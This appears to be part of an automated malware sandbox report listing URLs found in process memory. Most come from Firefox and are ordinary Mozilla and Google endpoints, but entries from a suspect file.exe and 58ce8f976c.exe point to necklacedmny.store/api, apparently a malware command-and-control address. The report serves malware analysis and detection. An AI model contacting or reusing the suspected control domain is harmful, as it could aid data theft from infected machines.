Source: firefox.exe, 0000001A.00000002.3232273931.0000019E47F00000.00000002.00000001.00040000.0000001C.sdmp String found in binary or memory: https://help.getpocket.com/article/1142-firefox-new-tab-recommendations-faq
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://helper1.dap.cloudflareresearch.com/v02
Source: firefox.exe, 0000001A.00000002.3224109770.0000019E3B811000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881
Source: firefox.exe, 0000001A.00000002.3232273931.0000019E47F00000.00000002.00000001.00040000.0000001C.sdmp String found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881a
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://ideas.mozilla.org/
Source: firefox.exe, 0000001A.00000002.3232273931.0000019E47F00000.00000002.00000001.00040000.0000001C.sdmp String found in binary or memory: https://img-getpocket.cdn.mozilla.net/7
Source: firefox.exe, 0000001A.00000003.3147296630.0000019E53CA6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://img-getpocket.cdn.mozilla.net/X
Source: firefox.exe, 0000001A.00000002.3234086295.0000019E48C79000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://incoming.telemetry.mozilla.org
Source: firefox.exe, 0000001A.00000002.3231295540.0000019E47EDF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3239630691.0000019E4954E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3234086295.0000019E48C79000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://incoming.telemetry.mozilla.org/submit
Source: firefox.exe, 0000001A.00000003.3113463433.0000019E53D23000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://infra.spec.whatwg.org/#ascii-whitespace
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://install.mozilla.org
Source: firefox.exe, 0000001A.00000002.3276626657.0000019E4CD52000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://json-schema.org/draft/2019-09/schema
Source: firefox.exe, 0000001A.00000003.3113463433.0000019E53D23000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lit.dev/docs/libraries/standalone-templates/#rendering-lit-html-templates
Source: firefox.exe, 0000001A.00000003.3113463433.0000019E53D23000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lit.dev/docs/templates/directives/#stylemap
Source: firefox.exe, 0000001A.00000003.3113463433.0000019E53D23000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lit.dev/docs/templates/expressions/#child-expressions)
Source: firefox.exe, 0000001A.00000002.3269450087.0000019E4C376000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://location.services.mozilla.com
Source: firefox.exe, 0000001A.00000002.3266603908.0000019E4C2CE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://location.services.mozilla.com/
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://location.services.mozilla.com/v1/country?key=%MOZILLA_API_KEY%
Source: firefox.exe, 0000001A.00000002.3266603908.0000019E4C2CE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3247453530.0000019E4B540000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://location.services.mozilla.com/v1/country?key=7e40f68c-7938-4c5d-9f95-e61647c213eb
Source: firefox.exe, 0000001A.00000002.3236996781.0000019E48E21000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3234086295.0000019E48CA6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/?extsrc=mailto&url=%s
Source: firefox.exe, 0000001A.00000002.3239630691.0000019E4954E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.inbox.lv/compose?to=%sv
Source: firefox.exe, 0000001A.00000002.3239630691.0000019E4954E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.yahoo.co.jp/compose/?To=%st
Source: firefox.exe, 0000001A.00000002.3231295540.0000019E47EDF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://merino.services.mozilla.com/api/v1/suggest
Source: firefox.exe, 0000001A.00000002.3232516855.0000019E48100000.00000002.00000001.00040000.0000001D.sdmp String found in binary or memory: https://merino.services.mozilla.com/api/v1/suggest5
Source: firefox.exe, 0000001A.00000002.3231295540.0000019E47EDF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://merino.services.mozilla.com/api/v1/suggestError
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://mitmdetection.services.mozilla.com/
Source: firefox.exe, 0000001A.00000002.3224109770.0000019E3B803000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3232516855.0000019E48100000.00000002.00000001.00040000.0000001D.sdmp, firefox.exe, 0000001A.00000002.3239630691.0000019E495BE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/?entrypoint=protection_report_monitor&utm_source=about-protections
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/about
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/breach-details/
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/oauth/init?entrypoint=protection_report_monitor&utm_source=about-protect
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/user/breach-stats?includeResolved=true
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/user/dashboard
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/user/preferences
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://mozilla-ohttp-fakespot.fastly-edge.com/
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://mozilla.cloudflare-dns.com/dns-query
Source: firefox.exe, 0000001A.00000002.3232516855.0000019E48100000.00000002.00000001.00040000.0000001D.sdmp String found in binary or memory: https://mozilla.org/W
Source: firefox.exe, 0000001A.00000002.3232516855.0000019E48100000.00000002.00000001.00040000.0000001D.sdmp String found in binary or memory: https://mzl.la/3NS9KJd
Source: file.exe, 00000000.00000003.2231452850.000000000156E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store
Source: 58ce8f976c.exe, 0000000A.00000003.2971263867.0000000000FBF000.00000004.00000020.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000A.00000003.2911175052.0000000000F9F000.00000004.00000020.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000A.00000003.2980379143.0000000000FBF000.00000004.00000020.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000A.00000003.3094090428.0000000000FC3000.00000004.00000020.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000C.00000003.3203204120.00000000018DE000.00000004.00000020.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000C.00000003.3131133881.00000000018DE000.00000004.00000020.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000C.00000003.3138408920.00000000018E0000.00000004.00000020.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000C.00000003.3067807604.0000000005FDE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store/
Source: 58ce8f976c.exe, 0000000A.00000003.2980379143.0000000000FBF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store/4
Source: 58ce8f976c.exe, 0000000C.00000003.3203204120.00000000018DE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store/7p4
Source: 58ce8f976c.exe, 0000000A.00000003.2980379143.0000000000FBF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store/D
Source: 58ce8f976c.exe, 0000000C.00000003.3067807604.0000000005FDE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store/L~
Source: 58ce8f976c.exe, 0000000C.00000003.3161372475.0000000005FDD000.00000004.00000800.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000C.00000003.3161906847.00000000018F9000.00000004.00000020.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000C.00000003.3049628457.00000000018DE000.00000004.00000020.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000C.00000003.3104075397.0000000005FD8000.00000004.00000800.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000C.00000003.3067807604.0000000005FDE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store/api
Source: file.exe, 00000000.00000003.2173591731.0000000001538000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store/api%H
Source: 58ce8f976c.exe, 0000000C.00000003.3067807604.0000000005FDE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store/api9
Source: 58ce8f976c.exe, 0000000C.00000003.3201552486.0000000005FDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store/api:
Source: file.exe, 00000000.00000003.2230773204.0000000001546000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store/apiD
Source: 58ce8f976c.exe, 0000000C.00000003.3083289579.0000000005FDA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store/apiMg
Source: 58ce8f976c.exe, 0000000C.00000003.3083289579.0000000005FDA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store/apiNBR
Source: file.exe, 00000000.00000003.2244012990.000000000156B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2269139740.000000000156C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store/apiT
Source: 58ce8f976c.exe, 0000000A.00000003.2911175052.0000000000F9F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store/apienw:
Source: file.exe, 00000000.00000003.2269022223.0000000001538000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store/apif
Source: 58ce8f976c.exe, 0000000A.00000003.3094128687.0000000000F9F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store/apioW
Source: 58ce8f976c.exe, 0000000A.00000003.2964739000.0000000000FBF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store/apip
Source: 58ce8f976c.exe, 0000000A.00000003.2895497004.0000000000FA9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store/f~
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://normandy.cdn.mozilla.net/api/v1
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://oauth.accounts.firefox.com/v1
Source: firefox.exe, 0000001A.00000002.3231295540.0000019E47EDF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ok.ru/
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://play.google.com/store/apps/details?id=org.mozilla.firefox&referrer=utm_source%3Dprotection_r
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://play.google.com/store/apps/details?id=org.mozilla.firefox.vpn&referrer=utm_source%3Dfirefox-
Source: firefox.exe, 0000001A.00000002.3239630691.0000019E4954E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://poczta.interia.pl/mh/?mailto=%sx
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://prod.ohttp-gateway.prod.webservices.mozgcp.net/ohttp-configs
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://profile.accounts.firefox.com/v1
Source: firefox.exe, 0000001A.00000002.3232516855.0000019E48100000.00000002.00000001.00040000.0000001D.sdmp String found in binary or memory: https://profiler.firefox.com
Source: firefox.exe, 0000001A.00000002.3239630691.0000019E4954E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://profiler.firefox.com/
Source: firefox.exe, 0000001A.00000002.3232273931.0000019E47F00000.00000002.00000001.00040000.0000001C.sdmp String found in binary or memory: https://reactjs.org/docs/error-decoder.html?invariant=
Source: firefox.exe, 0000001A.00000002.3231295540.0000019E47E75000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://redux.js.org/api-reference/store#subscribe(listener)
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://relay.firefox.com/accounts/profile/?utm_medium=firefox-desktop&utm_source=modal&utm_campaign
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://relay.firefox.com/api/v1/
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://safebrowsing.google.com/safebrowsing/diagnostic?site=
Source: firefox.exe, 0000001A.00000002.3231295540.0000019E47EDF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://safebrowsing.google.com/safebrowsing/downloads?client=SAFEBROWSING_ID&appver=%MAJOR_VERSION%
Source: firefox.exe, 0000001A.00000002.3286844037.0000019E4DC05000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://safebrowsing.google.com/safebrowsing/downloads?client=SAFEBROWSING_ID&appver=118.0&pver=2.2&
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://safebrowsing.google.com/safebrowsing/gethash?client=SAFEBROWSING_ID&appver=%MAJOR_VERSION%&p
Source: firefox.exe, 0000001A.00000002.3264016612.0000019E4C115000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://safebrowsing.google.com/safebrowsing/gethash?client=SAFEBROWSING_ID&appver=118.0&pver=2.2
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://safebrowsing.googleapis.com/v4/fullHashes:find?$ct=application/x-protobuf&key=%GOOGLE_SAFEBR
Source: firefox.exe, 0000001A.00000002.3286844037.0000019E4DC05000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://safebrowsing.googleapis.com/v4/fullHashes:find?$ct=application/x-protobuf&key=AIzaSyC7jsptDS
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://safebrowsing.googleapis.com/v4/threatHits?$ct=application/x-protobuf&key=%GOOGLE_SAFEBROWSIN
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://safebrowsing.googleapis.com/v4/threatListUpdates:fetch?$ct=application/x-protobuf&key=%GOOGL
Source: firefox.exe, 0000001A.00000002.3231295540.0000019E47E75000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://safebrowsing.googleapis.com/v4/threatListUpdates:fetch?$ct=application/x-protobuf&key=AIzaSy
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://sb-ssl.google.com/safebrowsing/clientreport/download?key=%GOOGLE_SAFEBROWSING_API_KEY%
Source: firefox.exe, 0000001A.00000002.3224109770.0000019E3B803000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3232516855.0000019E48100000.00000002.00000001.00040000.0000001D.sdmp, firefox.exe, 0000001A.00000002.3239630691.0000019E495BE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://screenshots.firefox.com
Source: firefox.exe, 0000001A.00000003.3085359079.0000019E4B80F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3247984693.0000019E4B603000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://screenshots.firefox.com/
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://services.addons.mozilla.org/api/v4/abuse/report/addon/
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://services.addons.mozilla.org/api/v4/addons/addon/
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://services.addons.mozilla.org/api/v4/addons/language-tools/?app=firefox&type=language&appversi
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://services.addons.mozilla.org/api/v4/addons/search/?guid=%IDS%&lang=%LOCALE%
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://services.addons.mozilla.org/api/v4/discovery/?lang=%LOCALE%&edition=%DISTRIBUTION%
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://services.addons.mozilla.org/api/v5/addons/browser-mappings/?browser=%BROWSER%
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://shavar.services.mozilla.com/downloads?client=SAFEBROWSING_ID&appver=%MAJOR_VERSION%&pver=2.2
Source: firefox.exe, 0000001A.00000002.3264016612.0000019E4C115000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://shavar.services.mozilla.com/downloads?client=SAFEBROWSING_ID&appver=118.0&pver=2.2
Source: firefox.exe, 0000001A.00000002.3264016612.0000019E4C115000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://shavar.services.mozilla.com/downloads?client=SAFEBROWSING_ID&appver=118.0&pver=2.2resource:/
Source: firefox.exe, 0000001A.00000002.3276626657.0000019E4CD52000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://shavar.services.mozilla.com/downloads?client=navclient-auto-ffox&appver=118.0&pver=2.2
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://shavar.services.mozilla.com/gethash?client=SAFEBROWSING_ID&appver=%MAJOR_VERSION%&pver=2.2
Source: firefox.exe, 0000001A.00000002.3264016612.0000019E4C115000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://shavar.services.mozilla.com/gethash?client=SAFEBROWSING_ID&appver=118.0&pver=2.2
Source: firefox.exe, 0000001A.00000002.3264016612.0000019E4C115000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://shavar.services.mozilla.com/gethash?client=SAFEBROWSING_ID&appver=118.0&pver=2.29FHiY4uhCsN7
Source: firefox.exe, 0000001A.00000002.3254465653.0000019E4BC13000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://smartblock.firefox.etp/facebook.svg
Source: firefox.exe, 0000001A.00000002.3254465653.0000019E4BC13000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://smartblock.firefox.etp/play.svg
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://snippets.cdn.mozilla.net/%STARTPAGE_VERSION%/%NAME%/%VERSION%/%APPBUILDID%/%BUILD_TARGET%/%L
Source: firefox.exe, 0000001A.00000002.3232273931.0000019E47F00000.00000002.00000001.00040000.0000001C.sdmp String found in binary or memory: https://snippets.mozilla.com/show/
Source: firefox.exe, 0000001A.00000002.3260229875.0000019E4C068000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com
Source: firefox.exe, 0000001A.00000003.3147296630.0000019E53C6A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.3165170400.0000019E4E0ED000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/
Source: firefox.exe, 0000001A.00000002.3276626657.0000019E4CD67000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/spocs
Source: firefox.exe, 0000001A.00000003.3147296630.0000019E53CA6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/spocs#
Source: firefox.exe, 0000001A.00000003.3147296630.0000019E53CA6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/spocs#l
Source: firefox.exe, 0000001A.00000002.3231295540.0000019E47EDF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3239630691.0000019E4954E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3234086295.0000019E48C79000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/user
Source: firefox.exe, 0000001A.00000002.3260229875.0000019E4C00E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3231295540.0000019E47EDF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://static.adsafeprotected.com/firefox-etp-js
Source: firefox.exe, 0000001A.00000002.3264016612.0000019E4C108000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://static.adsafeprotected.com/firefox-etp-pixel
Source: firefox.exe, 0000001A.00000002.3224109770.0000019E3B803000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3232516855.0000019E48100000.00000002.00000001.00040000.0000001D.sdmp, firefox.exe, 0000001A.00000002.3239630691.0000019E495BE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/cross-site-tracking-report
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/cryptominers-report
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/fingerprinters-report
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/firefox-relay-integration
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/password-manager-report
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/search-user-removal
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/send-tab
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/shield
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/social-media-tracking-report
Source: firefox.exe, 0000001A.00000002.3281903988.0000019E4D084000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/switching-devices?utm_source=panel-def
Source: firefox.exe, 0000001A.00000002.3281903988.0000019E4D084000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/switching-devices?utm_source=spotlight
Source: firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/tracking-content-report
Source: firefox.exe, 0000001A.00000003.3169464737.0000019E4DEB7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/118.0.1/WINNT/en-US/
Source: firefox.exe, 0000001A.00000002.3231295540.0000019E47EDF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3237977598.0000019E49010000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/captive-portal
Source: 58ce8f976c.exe, 0000000C.00000003.3089311175.00000000060F6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: firefox.exe, 0000001A.00000002.3232516855.0000019E48100000.00000002.00000001.00040000.0000001D.sdmp String found in binary or memory: https://support.mozilla.org/kb/firefox-crashes-troubleshoot-prevent-and-get-help
Source: firefox.exe, 0000001A.00000002.3264016612.0000019E4C115000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/firefox-crashes-troubleshoot-prevent-and-get-helptoolbar-menubar
Source: firefox.exe, 0000001A.00000002.3285958832.0000019E4DA19000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/fix-video-audio-problems-firefox-windows
Source: firefox.exe, 0000001A.00000002.3266603908.0000019E4C266000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/fix-video-audio-problems-firefox-windowsMediaPlatformDecoderNotFound
Source: firefox.exe, 0000001A.00000002.3266603908.0000019E4C266000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/fix-video-audio-problems-firefox-windowsMediaWMFNeeded
Source: firefox.exe, 0000001A.00000002.3273423332.0000019E4C980000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/fix-video-audio-problems-firefox-windowsThe
Source: firefox.exe, 0000001A.00000002.3273423332.0000019E4C980000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/fix-video-audio-problems-firefox-windowsUse
Source: firefox.exe, 0000001A.00000002.3264016612.0000019E4C115000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/refresh-firefox-reset-add-ons-and-settings
Source: firefox.exe, 0000001A.00000002.3264016612.0000019E4C115000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/refresh-firefox-reset-add-ons-and-settingschrome://browser/content/mi
Source: firefox.exe, 0000001A.00000002.3232516855.0000019E48100000.00000002.00000001.00040000.0000001D.sdmp, firefox.exe, 0000001A.00000002.3264016612.0000019E4C115000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/warning-unresponsive-script#w_other-causes
Source: firefox.exe, 0000001A.00000002.3264016612.0000019E4C115000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/warning-unresponsive-script#w_other-causesgetCanApplyUpdates
Source: firefox.exe, 0000001A.00000002.3232516855.0000019E48100000.00000002.00000001.00040000.0000001D.sdmp, firefox.exe, 0000001A.00000002.3264016612.0000019E4C115000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/website-translation
Source: firefox.exe, 0000001A.00000002.3264016612.0000019E4C115000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/website-translationresource://gre/modules/PrivateBrowsingUtils.sys.mj
Source: 58ce8f976c.exe, 0000000C.00000003.3089311175.00000000060F6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
